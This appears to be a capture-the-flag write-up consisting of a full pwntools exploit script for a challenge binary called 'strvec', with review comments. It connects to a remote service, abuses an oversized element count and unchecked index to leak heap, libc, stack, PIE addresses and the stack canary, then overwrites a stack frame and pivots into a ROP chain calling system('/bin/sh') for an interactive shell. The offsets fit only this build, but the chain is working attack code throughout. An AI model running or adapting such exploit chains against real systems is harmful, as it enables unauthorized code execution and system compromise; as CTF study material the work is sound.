Tags: pwn 

Rating: 2.3

```
from pwn import *

# Verbose pwntools I/O logging so every prompt/response of the session is shown.
context.log_level = 'debug'
# Local-process variant kept for reference; the live run goes to the remote service.
# p = process('./strvec')
TARGET_HOST, TARGET_PORT = '168.119.108.148', 12010
p = remote(TARGET_HOST, TARGET_PORT)
# Bundled libc build; only used for the symbol/string lookups further down.
libc = ELF('./libc-2.31.so')

def setValue(index, data, withline = True):
    """Drive menu option 2: store *data* in slot *index*.

    With ``withline`` (the default) the data is terminated by a newline;
    otherwise it is sent raw, for payloads that must not end in a newline
    byte. Uses the module-level connection ``p``.
    """
    p.sendlineafter('>', '2')
    p.sendlineafter('idx =', str(index))
    send = p.sendlineafter if withline else p.sendafter
    send('data =', data)

def getValue(index):
    """Drive menu option 1: ask the program to print slot *index*.

    The program's reply is left in the receive buffer of the module-level
    connection ``p`` for the caller to parse.
    """
    for prompt, answer in (('>', '1'), ('idx =', str(index))):
        p.sendlineafter(prompt, answer)

# What follows is the challenge-specific chain. Every hard-coded constant
# (heap/libc/PIE offsets, slot indices, frame deltas) is tied to this binary
# and the bundled libc-2.31 and transfers nowhere else. From a defender's
# angle the whole script rests on two things the program apparently lacks:
# an overflow-checked size computation for `n` and a bounds check on `idx`
# (both inferred from the inputs below, not visible here).

# --- setup: name buffer and element count ------------------------------------
# 14-byte name: a zero qword followed by the low six bytes of 0x31.
# NOTE(review): the layout resembles a heap chunk header (size 0x31); why it
# has to live in the name buffer is not determinable from the script.
name = p64(0) + p64(0x31)[:-2]
p.sendlineafter(':', name)
# Element count handed to the program: just over 2^29. Presumably the size
# arithmetic on this value wraps, so the allocation is much smaller than the
# index range the program later accepts. A checked multiply or an explicit
# upper bound on n would reject this input outright.
p.sendlineafter('n = ', str(0x1fffffff + 4))

# Three writes before the first read; which of these slots lies inside the
# real allocation cannot be told from here.
setValue(100, 'A'*0x8)
setValue(7, 'B'*8)
setValue(6, 'B'*8)

getValue(100)

# Leak-parsing convention used for every leak below: the reply is assumed to
# be the slot's raw bytes followed by '\n'; [-7:-1] keeps the six low bytes
# of a user-space x86-64 pointer and ljust() restores the two zero high bytes.
heap_leak = u64(p.recvline()[-7:-1].ljust(8, b'\0'))
# 0x330: distance from the leaked pointer to the heap start for this build.
heap_base = heap_leak - 0x330

info('heap_leak: ' + hex(heap_leak))
info('heap_base: ' + hex(heap_base))

# --- heap shaping ---------------------------------------------------------------
# Heap pointers and a 0x511 size field written into neighbouring slots.
# NOTE(review): looks like a forged chunk at heap_base + 0x3a0 with pointer
# fields either side of it — inferred from the values, not verified.
setValue(102, p64(heap_base + 0x3a0))
setValue(103, p64(0) + p64(0x511))
setValue(104, p64(heap_base + 0x3a0))

# Filler in slots 106..114.
for i in range(106, 115):
    setValue(i, 'C'*8)

# (0x510, 0x21) pairs written at a six-slot stride, slots 660..1074: a spray
# of what look like chunk size fields. The same stride is reused at the end.
for i in range(110, 180):
    setValue(6 * i, p64(0x510) + p64(0x21))

# --- libc leak ------------------------------------------------------------------
setValue(0x23, 'ZZZZ')
getValue(0x17)

libc_leak = u64(p.recvline()[-7:-1].ljust(8, b'\0'))
# Hard-coded offsets for the bundled libc-2.31 build; the ELF loaded above is
# only consulted for the final payload's symbol/string lookups.
libc_base = libc_leak - 0x1ebbe0
libc_environ = libc_base + 0x1ef2e0

info('libc_leak: ' + hex(libc_leak))
info('libc_base: ' + hex(libc_base))
info('libc_environ: ' + hex(libc_environ))

# --- stack leak through environ -----------------------------------------------
# NOTE(review): a pointer is written into slot 0x23 and the value is read
# back through a different index (0x1f), which suggests the program
# dereferences stored pointers on read. That is the read primitive the rest of
# the script depends on; the index mapping is not visible here.
setValue(0x23, p64(libc_environ))
getValue(0x1f)

stack_leak = u64(p.recvline()[-7:-1].ljust(8, b'\0'))
# Frame-relative addresses derived from the stack pointer found in environ;
# the 0x128/0x10/0x40/0x8 deltas belong to this binary's main frame.
name_ptr = stack_leak - 0x128 + 0x10
pie_ptr = name_ptr + 0x40
canary_ptr = name_ptr + 0x8

info('stack_leak: ' + hex(stack_leak))
info('name_ptr: ' + hex(name_ptr))
info('pie_ptr: ' + hex(pie_ptr))
info('canary_ptr: ' + hex(canary_ptr))

# --- PIE base and canary -------------------------------------------------------
# canary_ptr + 1 skips the canary's low byte, which is zero by construction;
# the parse below reinserts it.
setValue(0x23, p64(pie_ptr) + p64(canary_ptr + 1))
getValue(0x203)

pie_leak = u64(p.recvline()[-7:-1].ljust(8, b'\0'))
# 0x16c0: offset of the leaked code address within the PIE image.
pie_base = pie_leak - 0x16c0

info('pie_leak: ' + hex(pie_leak))
info('pie_base: ' + hex(pie_base))

getValue(0x204)

# Seven bytes come back ([-8:-1]); prefixing b'\0' rebuilds the 64-bit canary.
# Once the canary can be read, the stack protector no longer detects the frame
# overwrite done at slot 0x38 below — the leak, not the overwrite, is the
# point where the mitigation is lost.
canary = u64(b'\0' + p.recvline()[-8:-1].ljust(7, b'\0'))
info('canary: ' + hex(canary))

# --- final writes -----------------------------------------------------------------
setValue(0x31, p64(name_ptr) + p64(heap_base + 0x2a0))
setValue(0x1f, "AAAA")

# Gadget offsets inside the PIE image (binary-specific). `ret` is computed
# but never used below.
leave_ret = pie_base + 0x1666
pop_rdi_ret = pie_base + 0x1723
ret = pop_rdi_ret + 1

# ROP chain: pop rdi ; ret -> "/bin/sh" -> system(), both located via the
# libc ELF and relocated by libc_base.
payload = p64(pop_rdi_ret)
payload += p64(libc_base + next(libc.search(b'/bin/sh\0')))
payload += p64(libc_base + libc.sym['system'])

# Frame overwrite: a zero qword, the recovered canary, a saved-rbp value inside
# the heap, and leave;ret as the return address with its two zero high bytes
# trimmed. sendline then appends '\n'; presumably the program replaces that
# newline with a NUL, which is why this (and the name above) stops two bytes
# short rather than using withline=False.
setValue(0x38, p64(0) + p64(canary) + p64(heap_base + 0x948 + 0x10) + p64(leave_ret)[:-2])

setValue(6*110, p64(heap_base + 0x2a0) + p64(heap_base + 0x10))

# The chain is sprayed over the six-slot stride used earlier so the pivoted
# frame pointer lands on a copy of it.
for i in range(111, 180):
    setValue(6 * i, payload)

setValue(0x20, p64(0)*2)
setValue(0, p64(0))

# Manual checkpoint before the final step (attach a debugger here if needed).
pause()
# Menu option 3 presumably returns from main, which is what consumes the
# overwritten frame.
p.sendlineafter('>', '3')
p.interactive()
```